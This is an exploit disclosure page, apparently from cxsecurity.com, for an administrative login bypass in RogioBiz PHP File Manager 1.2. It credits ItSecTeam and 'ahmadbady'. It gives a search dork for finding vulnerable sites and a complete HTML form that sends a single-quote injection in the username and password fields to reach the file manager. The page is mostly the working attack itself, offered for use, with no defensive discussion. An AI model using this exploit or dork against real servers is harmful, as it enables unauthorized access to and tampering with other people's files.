RogioBiz PHP File Manager 1.2 administrative bypass

2010.03.16
Credit: ItSecTeam
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#########################bypass admin exploit################# Author: ItSecTeam download from:http://www.scriptingblog.com/download/RogioBiz_PHP_file_manager_V1.2.zip script:RogioBiz_PHP_file_manager_V1.2 dork:inurl:"/rbfminc/" ----------------------------------------- use:run this xpl and after runing eror Incorect username or password! now click to login (boom! go to file manager.) </html> </style></head> <h2>coded by ahmadbady</h2> <body><br /><br /><br /><br /> <div class="login"> <div style="color:red" align="center"></div> <form id="login_form" name="login_form" method="post" action="/path/file_manager.php"> <table border="0" align="center" cellpadding="4" cellspacing="0" bgcolor="#FFFFFF" style="border:1px solid #999999; padding:10px"> <tr> <td align="right">Username:</td> <td><input type="text" name="username" id="username" value="'" </tr> <tr> <td align="right">Password:</td> <td><input type="password" name="password" id="password" value="'" </td> </tr> <tr> <td colspan="2" align="right"><input type="submit" name="button" id="button" value="Login ?" /></td> </tr> </table> <input name="login" type="hidden" value="login" /> </form> </div> </body> </html> ######################## discovered by ahmadbady ########################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top